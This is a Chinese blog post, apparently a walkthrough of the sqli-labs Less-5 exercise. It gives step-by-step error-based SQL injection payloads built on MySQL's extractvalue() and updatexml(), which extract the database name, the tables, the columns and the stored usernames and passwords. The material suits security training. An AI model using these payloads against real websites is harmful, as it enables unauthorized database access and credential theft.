2. 程式人生 > 實用技巧 >Less-5-03

Less-5-03

阿新 發佈:2020-09-19

0x01 extractvalue()報錯注入

extractvalue(1,concat(0x7e,(select database()),0x7e))
爆資料庫:

?id=-1' and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+


爆表名:

?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e)) --+

爆列名:

?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),0x7e)) --+

爆欄位:

?id=-1' and extractvalue(1,concat(0x7e,(select concat_ws('-',username,password)from users limit 2,1),0x7e)) --+
#使用concat_ws()函式,逐個爆出

0x02 updatexml()報錯注入

updatexml(1,concat(0x7e,(select database()),0x7e),1)
爆資料庫:

?id=-1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+


爆表名:

?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1) --+

爆欄位名:

?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+

爆資料:

?id=-1' and updatexml(1,concat(0x7e,(select concat_ws('-',username,password) from users limit 0,1),0x7e),1) --+
#使用concat_ws()逐個爆出資料

參考連結:
《sql注入天書》

相關推薦

Less-5-03

0x01 extractvalue()報錯注入 extractvalue(1,concat(0x7e,(select database()),0x7e)) 爆資料庫: ?id=-1\' and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+

Less-5-02

0x01判斷注入型別 字元型_單引號_雙注入 ?id=1 ?id=1\' ?id=1" 單引號字元型注入,1,3顯示youarein,2單引號報錯

sqli-lbs:Less-5~10 Double Query- Single Quotes- String

第五關:Double Query- Single Quotes- String 1.輸入?id=2看見頁面如下:輸入?id=666時,發現頁面發生變化 說明頁面沒有顯示位。無法使用聯合查詢注入 2.接著我們嘗試在URL中輸入 ?id=2’ 頁面出現錯誤語句

5-03 四層反向代理

1四層反向代理 1.1安裝 hdss7-11hdss7-11 yum install -y nginx 1.2代理配置 hdss7-11hdss7-12 /etc/nginx/nginx.conf

Less-5闖關失敗

這個闖關過程除了問題,用以上方法只能猜到第四位,無法完整的猜完整個資料庫版本。搜了很多,沒有找到答案,有知道的評論一下。等我換個方法再出一個第五關的闖關教程

Less-5

Less-5 第五關:Please input the ID as parameter with numeric value    (1)判斷注入點閉合方式

03-5 docker映象管理之檢視映象的詳細資訊

03-5 docker映象管理之檢視映象的詳細資訊 docker image inspect [命令引數] [映象名稱]:[映象版本]

03.課程相關5張表設計

1.課程主頁面3張表 models from django.db import models from utils.MyBaseModel import Base class CourseType(Base):

There were 5 failed launches in a row, each lasting less than 300 seconds. Giving up

技術標籤:mycat連線異常mysql 問題:mycat無法執行,Navicat無法連線mycat 在啟動mycat是後顯示的是mycat正在執行,但是Navicat還是無法連線,繼而檢視mycat的狀態,發現mycat的服務並不在執行。

華為:openEuler 22.03 LTS 將基於 Linux Kernel 5.10 構建

5 月 23 日訊息Linux Kernel 5.10 維護週期已確定從 2 年延長至 6 年。華為本週表示,按照版本計劃,openEuler 22.03 將於明年釋出,並將基於 Linux Kernel 5.10 構建。

WPF進階技巧和實戰03-控制元件(5-列表、樹、網格03

資料檢視 資料檢視是在後臺工作的,用於協調繫結資料的集合。使用資料檢視可以新增導航邏輯、實現資料過濾、排序、分組。

Go語言學習03.5-目錄檔案與API

關於API含義有很多,這裡就是使用者的幫助手冊之意 0x00 目錄文件 0x01 API(應用程式介面)

【DSP視訊教程】DSP視訊教程第5期:Matlab生成C演算法檔案在STM32上執行,相比Simulink生成C工程具有更廣泛適用性(2022-03-27)

視訊教程彙總帖:https://www.armbbs.cn/forum.php?mod=viewthread&tid=110519 本期視訊教程為大家分享Matlab生成C演算法檔案。與上期的Matlab Simulink不同,這次可以把Matlab的m指令碼檔案生成的C檔案移植到板

2022-03-31 10票5金,剛發現了版本之子就又要大改版。。

各種亂七八糟0勝,不斷換英雄之後,昨天晚上終於找到了版本之子,截至目前,花了10票,打了5金,勝率75%以上!

【每天學一點-03】 使用Html5+Less實現簡單的靜態登入介面(入門Less

1、首先引用Less 有npm安裝、cdn引用、或者下載Less.js本地引用,我採用的是第三種方法

分庫分表的5大方案,百度、騰訊、阿里等大廠都在用!

資料庫瓶頸 不管是IO瓶頸,還是CPU瓶頸,最終都會導致資料庫的活躍連線數增加,進而逼近甚至達到資料庫可承載活躍連線數的閾值。在業務Service來看就是,可用資料庫連線少甚至無連線可用。接下來就可以想象了吧(併發

價值超5萬的撮合引擎:開篇

前言 自從有人在微信群裡開價5萬求購Golang版的撮合引擎之後,我就想自己開發一款,畢竟,以我的經驗來說,開發個高效能的撮合引擎並沒什麼難度。

Spring整合RabbitMQ-03-SimpleMessageListenerContainer

SimpleMessageListenerContainer 簡單訊息監聽容器,這個類非常強大,我們可以對他進行很多設定,對於訊息的配置項,這個類都可以滿足;

5. 彤哥說netty系列之Java NIO核心元件之Channel

你好,我是彤哥,本篇是netty系列的第五篇。 簡介 上一章我們一起學習瞭如何使用Java原生NIO實現群聊系統,這章我們一起來看看Java NIO的核心元件之一——Channel。

Alibaba Arthas 3.1.5版本支援火焰圖,快速定位應用熱點

Arthas是Alibaba開源的Java診斷工具,深受開發者喜愛。 Github: github.com/alibaba/art…